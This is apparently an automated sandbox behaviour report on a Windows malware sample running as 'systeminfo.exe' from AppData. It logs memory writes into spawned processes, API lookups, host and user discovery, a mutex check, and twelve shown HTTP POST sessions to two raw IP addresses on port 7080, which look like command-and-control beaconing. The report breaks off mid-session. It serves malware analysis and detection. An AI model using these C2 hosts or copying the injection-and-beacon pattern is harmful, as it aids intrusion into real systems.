Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x400000, size = 102400 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x400000, size = 372736 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x400000, size = 114688 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Module (90)
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x752a0000 True 1
Fn
Load KERNEL32.dll base_address = 0x759f0000 True 1
Fn
Load USER32.dll base_address = 0x75790000 True 1
Fn
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Fn
Load advapi32.dll base_address = 0x756e0000 True 4
Fn
Load crypt32.dll base_address = 0x758d0000 True 3
Fn
Load shell32.dll base_address = 0x75c50000 True 3
Fn
Load urlmon.dll base_address = 0x76c40000 True 3
Fn
Load userenv.dll base_address = 0x74b90000 True 4
Fn
Load wininet.dll base_address = 0x75350000 True 3
Fn
Load wtsapi32.dll base_address = 0x74bb0000 True 4
Fn
Load mpr.dll base_address = 0x741e0000 True 1
Fn
Load netapi32.dll base_address = 0x741c0000 True 1
Fn
Load SAMCLI.DLL base_address = 0x74170000 True 1
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 22
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36f9bc True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36f9f4 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Fn
Create Mapping C:\ProgramData\FB2F.tmp filename = C:\ProgramData\FB2F.tmp, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\ProgramData\FB2F.tmp process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (132)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 3
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:23 (Local Time) True 6
Fn
Get Info type = Operating System False 3
Fn
Get Info type = Hardware Information True 3
Fn
Mutex (7)
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Release - True 1
Fn
Network Behavior
HTTP Sessions (21)
Information Value
Total Data Sent 6.79 KB (6955 bytes)
Total Data Received 435.79 KB (446252 bytes)
Contacted Host Count 2
Contacted Hosts 173.201.20.6, 159.203.94.198
HTTP Session #1
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 432.75 KB (443132 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 443124, size_out = 443124 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #2
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #3
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #4
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #5
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #6
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #7
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #8
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #9
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #10
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #11
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #12
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
